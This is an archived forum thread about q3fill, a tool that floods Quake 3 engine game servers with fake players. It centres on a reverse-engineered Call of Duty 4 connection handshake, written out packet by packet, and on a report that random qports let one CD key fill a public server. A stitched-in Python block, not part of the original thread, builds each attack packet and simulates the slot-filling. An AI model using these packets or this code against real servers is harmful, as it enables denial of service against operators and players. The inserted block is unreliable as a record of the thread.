Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 11 posts ] 
 Post subject: q3fill
PostPosted: 24 Jul 2008 16:41 

Joined: 24 Jul 2008 16:36
Posts: 4
Hi there,

I get this message, how could I solve it?

The game is COD4.

[image]


 Post subject:
PostPosted: 25 Jul 2008 04:04 

Joined: 16 Aug 2007 06:25
Posts: 367
COD4 is interesting, and I believe you are going to need a cd key for each player in order to successfully perform a fake player DoS. I think the protocol differs slightly from the classic q3 protocols, but I haven't researched the classic ones so I couldn't tell you for sure. But I can tell you what packets are sent when a user connects to a server, and Luigi might be able to work with this information to create something:

1)
Client -> cod4master.activision.com:20800
UDP Packet: \xff\xff\xff\xffgetKeyAuthorize 0 1234abcd1234abcd PB 76fec7a62184097987236446dba0f454

About: 1234abcd1234abcd is the first 16 characters of the cd key, and 76fec7a62184097987236446dba0f454 is the PB GUID of that cd key (based off the first 16 characters of the key, more info here: /cod4key2guid-t375.html). This 1 packet is sent to the master server, and no reply appears to ever be sent back. It's like a notification saying "hey master server, I'm going to be using this key just so you know" or something similar. I'll explain what happens later if you don't submit this packet.

2)
Client -> cod4 server
UDP Packet: \xff\xff\xff\xffgetchallenge 0 "76fec7a62184097987236446dba0f454"

About: Once again the GUID is sent from your client requesting a challenge code, but this time it's sent to the cod4 server you're connecting to, not the master server.

3)
cod4 server -> Client
UDP Packet: various replies can be sent, see "about" below:

About: After the getchallenge string is sent to the cod4 server, the server will reply with 1 of 3 things from what I've found:

\xff\xff\xff\xffneedcdkey - from what I've noticed, this usually means the first packet (in #1) was never sent to the master server. It may have been sent, but considering the connection-less nature of UDP the packet may have been lost on the way, and never received by the master server.

\xff\xff\xff\xfferror\x0aEXE_ERR_CDKEY_IN_USE - this reply displays the word 'error' with a line feed (hex 0a), and then the error EXE_ERR_CDKEY_IN_USE. This error is obvious: the cd-key is in use. But I also seem to get this error when the cd key is invalid. Might be an error on their part, but I can't ever seem to get a different reply when I use an invalid key. So don't let this fool you into thinking the cd key is in use all the time.

\xff\xff\xff\xffchallengeResponse 123456789 - this means the key was NOT in use by another player, and was accepted by the cod4 server, and you were given a challenge response to be used further down the "connecting to server" road. This is what you probably want to see when performing the fake player DoS, but it requires a valid key to see.

If you were able to get a "challengeresponse" like the one above, you're still able to keep on going.

4)
Client -> cod4 server
UDP Packet: \xff\xff\xff\xffconnect "\cg_predictItems\1\cl_anonymous\0\cl_punkbuster\1\cl_voice\1\cl_wwwDownload\1\rate\25000\snaps\20\name\FakePlayer1\protocol\6\challenge\123456789\qport\-11037"

About: Pretty self explanatory. Looks like the client's settings that he wishes to use, along with his challenge string, player name, etc.

5)
cod4 server -> Client
UDP Packet: \xff\xff\xff\xffconnectResponse\x20

About: Just a string sent from the server with the hex character 20 at the end (space).

From here on out, it appears that the client and server first exchange the client's player stats, and then start exchanging encoded/encrypted/unreadable data. That is where I left off with my research, so hopefully you and/or Luigi can use that information to improve upon the fake players DoS for q3 games. Enjoy, and good luck. Let me know if I need to clarify anything.


 Post subject:
PostPosted: 25 Jul 2008 07:18 

Joined: 24 Jul 2008 16:36
Posts: 4
Wow, I can't understand what this whole thing means :S


 Post subject:
PostPosted: 25 Jul 2008 08:20 

Joined: 16 Aug 2007 06:25
Posts: 367
united wrote:
Wow, I can't understand what this whole thing means :S


Well hopefully Luigi can take a look at it, and tell you if he thinks a fake player DoS is possible for COD4.

Basically, COD4 does things differently, and I was providing information about the protocol that might be able to help in creating fake players


 Post subject:
PostPosted: 26 Jul 2008 15:43 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
Nice work SomaFM. Anyway, I will not add the CoD4 authentication to q3fill since it is out of the purpose of the tool and because it could make the code (or the options) too chaotic.


 Post subject:
PostPosted: 31 Jul 2008 09:59 

Joined: 16 Aug 2007 06:25
Posts: 367
Edit: some of this information is incorrect, see my latest post for more info

I did a little further testing with this and I was successfully able to fill a slot. The slot is filled after the client sends the connect string to the server(see #4 in my post above), and the server has to reply with the "connectresponse" string (see #5 in my post above).

If the server gives any errors, no slot is ever filled and you will have to start the connection process over. However, once you are able to get the "connectresponse" string from the server, the client stays in the server's player list for about 15 seconds. Your fake player's name will show in the list (unlike other games such as BF2), so an admin is most likely able to ban your GUID and/or IP address because he can see you -- this sort of ruins the idea of a "fake player DoS" since admins will probably just ban you :P

However, it's still possible to fill a server... but you need a unique cd-key for each fake player. Using a cd-key that is already connected will either kick your fake player offline, or give you an error such as cdkey in use. I think you only get the "cdkey in use" error if the client is a fully connected "real" client, and not a fake player. I think this because I wasn't able to get a "cd-key in use" error during these latest tests... it would just kick my old fake player and connect with the new one. So this probably means the cd-key isn't globally registered as "in use" until the client is actually playing in a server on the key.

Lastly, the server must allow clients to have the same IP, or you will get that stupid "server for low pings only" error (see /q3fill-t450.html for more info). I think this is a dumb idea to have in a game anyway since multiple clients can be behind a natted IP...

Spoofing is probably not possible since you must be able to receive your challenge code from the server in order to connect. However, it may be possible to have your script get the challenge code, and then send the "connect string" on a spoofed ip. It's worth a shot, but it all depends on if the challenge can be used by an ip that it wasn't created on.

In the end, very interesting stuff. If you have 64 cd-keys you can flood pretty much any server :P. If anyone is interested in my php code I used to spoof 1 client, let me know and I can post it, but if you read my first post it should be very easy to write your own script.

Soma


Last edited by SomaFM on 31 Jul 2008 12:58, edited 1 time in total.

 Post subject:
PostPosted: 31 Jul 2008 10:58 

Joined: 16 Aug 2007 06:25
Posts: 367
Wow! Completely ignore my last post. I was able to successfully flood a server with 1 cd-key. The reason why I was having disconnect issues with my fake players in my last post is that I was using the same "qport" in my connect string. Simply generating a random qport (from 10000 - 65535) allowed me to completely fill a public server with 1 cd-key. So just use a random player name and qport, and it will work.

More to come...

Edit: Made a new thread with sample code, pictures, information on CoD4 fake players -- /fake-playe ... -t454.html
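The five-packet exchange laid out in SomaFM's first reply above (getKeyAuthorize, getchallenge, the three possible replies, connect, connectResponse) together with the qport behaviour reported in this post, as an added example that is not code from the thread, from q3fill, or from the game. The packet builders and the reply parser follow the byte strings quoted in the post; the in-process stand-in for the server is an assumption made here that models only what the posts observed, namely that a second connect from the same address with the same qport replaces the earlier fake client, while a different qport takes a new slot. The master server is not modelled (a preset set of authorized GUIDs stands in for it), the server's real slot logic is unknown, and the error texts "bad challenge", "server is full" and "unknown command" are invented for the stand-in. The key prefix and GUID are the placeholders from the post, not a real key.

```python
import random
import re

# Values quoted in the thread; the key prefix and GUID are the post's own
# placeholders, not a real CD key.
OOB = b"\xff\xff\xff\xff"            # connectionless-packet marker
SAMPLE_KEY16 = "1234abcd1234abcd"
SAMPLE_GUID = "76fec7a62184097987236446dba0f454"
PROTOCOL = 6

def build_key_authorize(key16, guid):
    """Packet 1: client -> master server (cod4master.activision.com:20800)."""
    return OOB + f"getKeyAuthorize 0 {key16} PB {guid}".encode()

def build_getchallenge(guid):
    """Packet 2: client -> game server."""
    return OOB + f'getchallenge 0 "{guid}"'.encode()

def parse_server_reply(pkt):
    """Packets 3 and 5: classify a server reply as a (kind, value) tuple."""
    if not pkt.startswith(OOB):
        raise ValueError("not a connectionless packet")
    body = pkt[4:].decode(errors="replace")
    if body.startswith("needcdkey"):
        return ("needcdkey", None)
    if body.startswith("error\n"):                 # 'error' + line feed + text
        return ("error", body[len("error\n"):].strip())
    m = re.match(r"challengeResponse (-?\d+)", body)
    if m:
        return ("challenge", int(m.group(1)))
    if body.startswith("connectResponse"):
        return ("connected", None)
    return ("unknown", body)

def build_connect(name, challenge, qport):
    """Packet 4: the userinfo string with the fields the post shows."""
    userinfo = (
        r"\cg_predictItems\1\cl_anonymous\0\cl_punkbuster\1\cl_voice\1"
        r"\cl_wwwDownload\1\rate\25000\snaps\20"
        f"\\name\\{name}\\protocol\\{PROTOCOL}\\challenge\\{challenge}"
        f"\\qport\\{qport}"
    )
    return OOB + f'connect "{userinfo}"'.encode()

def parse_userinfo(s):
    r"""Turn '\key\value\key\value' into a dict."""
    parts = s.strip("\\").split("\\")
    return dict(zip(parts[0::2], parts[1::2]))

def random_qport():
    """Per-client qport in the range the follow-up post used."""
    return random.randint(10000, 65535)

class SimulatedServer:
    """Toy stand-in (assumption, not CoD4 code): a slot is keyed by
    (address, qport), so a reconnect with the same qport replaces the old
    entry instead of taking a second slot, which is what the thread saw.
    The master server is not modelled; 'authorized' stands in for it."""

    def __init__(self, maxclients=64, authorized=()):
        self.maxclients = maxclients
        self.authorized = set(authorized)
        self.challenges = {}   # addr -> challenge handed out
        self.clients = {}      # (addr, qport) -> player name

    def handle(self, addr, pkt):
        body = pkt[4:].decode()
        if body.startswith("getchallenge"):
            guid = body.split('"')[1]
            if guid not in self.authorized:
                return OOB + b"needcdkey"
            ch = random.randint(1, 2**31 - 1)
            self.challenges[addr] = ch
            return OOB + f"challengeResponse {ch}".encode()
        if body.startswith("connect"):
            info = parse_userinfo(body.split('"')[1])
            if int(info["challenge"]) != self.challenges.get(addr):
                return OOB + b"error\nbad challenge"        # invented text
            slot = (addr, int(info["qport"]))
            if slot not in self.clients and len(self.clients) >= self.maxclients:
                return OOB + b"error\nserver is full"       # invented text
            self.clients[slot] = info["name"]
            return OOB + b"connectResponse "
        return OOB + b"error\nunknown command"              # invented text

def join(server, addr, guid, name, qport):
    """Run one client through packets 2 to 5; returns the final reply kind."""
    kind, value = parse_server_reply(server.handle(addr, build_getchallenge(guid)))
    if kind != "challenge":
        return kind
    kind, _ = parse_server_reply(server.handle(addr, build_connect(name, value, qport)))
    return kind
```

Nothing here touches the network: join() walks a client through packets 2 to 5 against the stand-in, and a real run would send the same bytes over UDP and feed whatever comes back to parse_server_reply. Calling join() twice with the same qport leaves one entry in the stand-in's client table; calling it with random_qport() each time fills a new slot per call, which is the difference between the two SomaFM posts above.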


 Post subject:
PostPosted: 31 Jul 2008 14:54 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
well done


 Post subject: Re: q3fill
PostPosted: 07 Jan 2009 17:39 

Joined: 07 Jan 2009 17:33
Posts: 2
Could someone help me with this problem that I have.
When I try to open q3fill.exe, it shuts in the same second I open it.
It flashes the cmd prompt quickly there but it won't stay open.
I've got Vista but that ain't the problem, because on my other PC it works like a dream.
Anyone have any idea why this happens?
Or am I just an unlucky child :D


 Post subject: Re: q3fill
PostPosted: 07 Jan 2009 18:36 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
http://aluigi.org/about.htm#howuse


 Post subject: Re: q3fill
PostPosted: 07 Jan 2009 18:41 

Joined: 07 Jan 2009 17:33
Posts: 2
Yeah, I forgot I need to open it in the cmd prompt :D
Stupid me, sorry for disturbing you :D

